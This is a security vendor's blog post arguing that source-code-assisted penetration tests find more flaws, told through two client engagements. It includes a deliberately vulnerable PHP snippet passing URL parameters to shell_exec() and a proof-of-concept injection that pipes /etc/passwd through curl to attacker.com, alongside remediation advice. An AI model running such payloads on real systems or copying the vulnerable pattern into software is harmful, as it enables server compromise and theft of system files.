Why You Should Consider a Source Code Assisted Penetration Test
In almost every industry, client-provider relationships look for win-win scenarios. For some, a win-win is as simple as a provider getting paid and the client getting value out of the money they paid for the service or product. While delivering high-quality services is certainly a big win, there are many opportunities in the pentesting space to win even bigger from the perspective of both the client and the provider. Enter: source code assisted penetration testing.
Here’s the TL;DR of this article in a quick bullet list:
Five reasons why you should consider a source code assisted pentest:
- More thorough results
- More comprehensive testing
- More vulnerabilities discovered
- No added cost
- Much more specific remediation guidance for identified vulnerabilities
Not convinced? Let’s take a deeper dive into why you should choose a source code assisted pentest over a black-box or grey-box pentest.
Cost
We should probably get this out of the way first. To make a long story short, there’s no extra cost to do source code assisted penetration testing with NetSPI. This is a huge win, but it is by no means the only benefit of a source code assisted pentest. We’ll discuss the benefits in greater detail below.
Black-box vs. grey-box vs. white-box penetration testing
Penetration testing is typically performed from a grey-box or black-box perspective. Let’s define these terms:
Black-box: This means that the assessment is performed from the perspective of a typical attacker on the internet. No special access, documentation, source code, or inside knowledge is provided to the pentester in this type of engagement. This type of assessment emulates a real-world attacker scenario.
Grey-box: This means that the assessment is performed with limited knowledge of the inner workings of the application (usually given to the tester through a demo of the application). Access is typically granted to the testers by providing non-public access to the application in the form of user or admin accounts for use in the testing process. Grey-box is the typical perspective of most traditional pentests.
White-box: This is where source code assisted pentests live. This type of assessment includes everything that a grey-box one would have but adds onto it by providing access to the application’s source code. This type of engagement is far more collaborative. The pentester often works with the application architects and developers to gain a better understanding of the application’s inner workings.
Many clients come into a pentest wanting a black-box test of their application. This seems very reasonable when you put yourself in their shoes, because what they’re ultimately concerned about is the real-world attacker scenario. They don’t expect an attacker to have access to administrative accounts, or even customer accounts. They also don’t expect an attacker to have access to their internal application documentation, and certainly not to the source code. These assumptions sound reasonable, but let’s discuss why they’re misleading.
Never assume your user or admin accounts are inaccessible to an attacker
If you want an in-depth discussion on how attackers gain authenticated access to an application, go read this article on our technical blog, Login Portal Security 101. In summary, an attacker will almost always be able to get authenticated access into your application as a normal user. At the very least, they can usually go the legitimate route of becoming a customer to get an account created, but typically this isn’t even necessary.
Once the authentication boundary has been passed, authorization bypasses and privilege escalation vulnerabilities are exceedingly common findings even in the most modern of applications. Here’s one (of many) example on how an attacker can go from normal user to site admin: Insecurity Through Obscurity.
Never assume that your source code is inaccessible to an attacker
We’ve encouraged clients to choose source code assisted pentesting for some time now, but there are many reasons why organizations are hesitant to give out access to their source code. Most of these concerns are for the safety and privacy of their codebase, which contains highly valuable intellectual property. These are valid concerns, and it’s understandable to wait until you’ve established a relationship of trust before handing over your crown jewels. In fact, I recommend this approach if you’re dealing with a company whose reputation and integrity you cannot verify. However, let me demonstrate why source code assisted pentests are so valuable by telling you about one of our recent pentests:
Customer A did not provide source code for an assessment we performed. During the engagement, we identified a page that allowed file uploads. We spent some time testing how well they had protected against uploading potentially harmful files, such as .aspx, .php, .html, etc. This endpoint appeared to have a decent whitelist of allowed files and wouldn’t accept any malicious file uploads that we attempted. The endpoint did allow us to specify certain directories where files could be stored (instead of the default locations) but was preventing uploads to many other locations. Without access to the source code handling these file uploads, we spent several hours working through different tests to see what we could upload, and to where. We were suspicious that there was a more significant vulnerability within this endpoint, but eventually moved on to testing other aspects of the application given the time constraints of a pentest.
A few days later, we discovered another vulnerability that allowed us to download arbitrary files from the server. Due to another directory traversal issue, we were finally able to exfiltrate the source code that handled the file upload we had been testing previously. With access to the source, we quickly saw that they had an exception to their restricted files list when uploading files to a particular directory. Using this “inside knowledge” we were able to upload a webshell to the server and gain full access to the web server. This webshell access allowed us to… you guessed it… view all their source code stored on the web server. We immediately reported the issue to the client and asked whether we could access the rest of the source code stored on the server. The client agreed, and we discovered several more vulnerabilities within the source that could have been missed if we had continued in our initial grey-box approach.
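To make that pattern concrete, here is a rough PHP sketch of the kind of upload logic at play. Every name, path, and extension below is invented for illustration; only the overall pattern, an extension check with an exception for one target directory, comes from the actual finding.

```php
<?php
// Illustrative sketch only: an extension check that is silently skipped
// for one "trusted" upload directory. All names and paths are hypothetical.

$blockedExtensions = ['aspx', 'php', 'phtml', 'html', 'jsp'];

function isUploadAllowed(string $fileName, string $targetDir, array $blocked): bool
{
    // Hypothetical exception: uploads to this directory bypass the check entirely
    if ($targetDir === '/uploads/reports/') {
        return true;
    }

    // Everything else is filtered by extension
    $extension = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
    return !in_array($extension, $blocked, true);
}
```

From the outside, an endpoint like this looks well protected; with the source in hand, the one directory that skips the check stands out immediately.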
Attackers are not bound by time limits, but pentesters are
The nature of pentesting requires that we only spend a predetermined amount of time pentesting a particular application. The story above illustrates how much valuable time is lost when pentesters have to guess what is happening on the server-side. Prior to having the source code, we spent several hours going through trial and error in an attempt to exploit a likely vulnerability. Even after all that time, we didn’t discover any particularly risky exploit and could have passed this over as something that ultimately wasn’t vulnerable. However, with a 5-minute look at the code, we immediately understood what the vulnerability was, and how to exploit it.
The time savings alone is a huge win for both parties. Saving several hours of guesswork during an assessment that lasts only 40 hours is extremely significant. You might be saying, “but if you couldn’t find it, that means it’s unlikely someone else would find it… right?” True, but “unlikely” does not mean “impossible.” Would you rather leave a vulnerability in an application when it could be removed?
Let’s illustrate this point with an example from a successful source code assisted penetration test. During the assessment, we discovered an endpoint that did not show up in our scans, spiders, or browsing of the application. By looking through the source code, we found that the endpoint could still be accessed if browsed to explicitly, and we determined the structure of the request accepted by this “hidden” endpoint.
The controller took a “start_date” and “end_date” from the URL and then passed those variables into another function that used them in a very unsafe manner:
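Here is a minimal PHP sketch of that pattern. The parameter names, the $scriptOgcJs variable, and the shell_exec() call come from the finding described below; the script path and command structure are assumptions for illustration.

```php
<?php
// examplecontroller.php -- minimal sketch of the vulnerable pattern.
// The script path and command structure are illustrative assumptions.

$startDate = $_GET['start_date'];   // taken straight from the URL, no validation
$endDate   = $_GET['end_date'];

// The unsanitized values are concatenated directly into a shell command string...
$scriptOgcJs = "/opt/app/bin/generate_report.sh {$startDate} {$endDate}";

// ...which is then handed to the system shell, allowing command injection
$output = shell_exec($scriptOgcJs);
echo $output;
```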
This PHP file used the unfiltered, unvalidated, unsanitized parameters directly in a string that was passed to a shell_exec() call. Because shell_exec() executes its argument as a system shell command, this resulted in command injection on the server. As a proof of concept, we made the following request to the server and were able to exfiltrate the contents of /etc/passwd to an external server: https://redacted.com/redacted/vulnpath?start_date=2017-07-16|echo%20%22cmd=cat%20/etc/passwd%22%20|%20curl%20-d%20@-%20https%3a%2f%2fattacker.com%2flog%20%26 (URL-decoded, the injected start_date value is 2017-07-16|echo "cmd=cat /etc/passwd" | curl -d @- https://attacker.com/log &).
In layman’s terms: An attacker is essentially able to run any code they want on the server with this vulnerability, which could lead to full host or even network compromise.
With a vulnerability this significant, you should be wondering why this endpoint never showed up in any of our black-box or grey-box pentesting. The answer is that this particular endpoint was only supposed to be used by a subset of the client’s customers, and the testing accounts we were given did not include the flag that exposed it. Had this been a pentest without access to source code, the endpoint would almost certainly have been missed, and the command injection vulnerability would still be sitting in the open for any customer accounts that could see it. After fixing the vulnerability, the client confirmed that no one had already exploited it and breathed a huge sigh of relief.
On the other hand, the client in our first example had a far different outcome. Even though the company immediately fixed the vulnerability in the latest version of the product, they failed to patch previously deployed instances and those instances were hacked months later. A key portion of the hacker’s exploit chain was the file upload vulnerability we had identified using the source code.
Had we not discovered the vulnerability and disclosed it to them, the hack would have been much worse. Perhaps the attackers used the same methodology we did, but it’s just as likely that they found a different way to exploit that file upload. This is a perfect example of why source code assisted pentests should be your go-to approach. Because we had access to the source code, we discovered the vulnerability months before they were hacked. If they had properly remediated it across all deployed instances, they could have avoided an exceptionally costly breach.
Specific Remediation Guidance
To close out this post, I want to highlight how much more specific the remediation guidance can be when we’re performing a source code assisted pentest as opposed to one without source code. Here’s an example of the remediation guidance given to the client with the vulnerable PHP script described above:
Use escapeshellarg() to prevent attacker-controlled input from being interpreted as additional shell arguments or commands. Specifically, change line 47 to this:
$output = shell_exec(escapeshellarg($scriptOgcJs));
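Note that if line 47 builds the command by concatenating the user-supplied dates into a larger string (as in the sketch above), escapeshellarg() should be applied to each user-controlled value individually rather than to the whole command string, for example (variable names are illustrative):

```php
// Hypothetical per-argument escaping; $startDate and $endDate hold the user-supplied values
$output = shell_exec($scriptPath . ' ' . escapeshellarg($startDate) . ' ' . escapeshellarg($endDate));
```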
Additionally, the startDate and endDate parameters should be validated as real dates on line 26 of the examplecontroller.php page. We recommend using the PHP checkdate() function as a whitelist measure to prevent anything other than a well-formed date from being used in sensitive functions. Reference: https://www.php.net/manual/en/function.checkdate.php
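For illustration, a minimal validation sketch using checkdate() might look like the following (function and variable names are hypothetical):

```php
<?php
// Hypothetical date validation for the start_date / end_date parameters,
// using checkdate() as recommended above.
function isValidDate(string $value): bool
{
    // Require a strict YYYY-MM-DD format
    if (!preg_match('/^(\d{4})-(\d{2})-(\d{2})$/', $value, $m)) {
        return false;
    }
    // checkdate(month, day, year) confirms the date actually exists
    return checkdate((int) $m[2], (int) $m[3], (int) $m[1]);
}

if (!isValidDate($_GET['start_date'] ?? '') || !isValidDate($_GET['end_date'] ?? '')) {
    http_response_code(400);
    exit('Invalid date parameter');
}
```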
Without access to the source code, we are only able to give generic guidance for remediation steps. With the source code, we can recommend specific fixes that should help your developers more successfully remediate the identified vulnerabilities.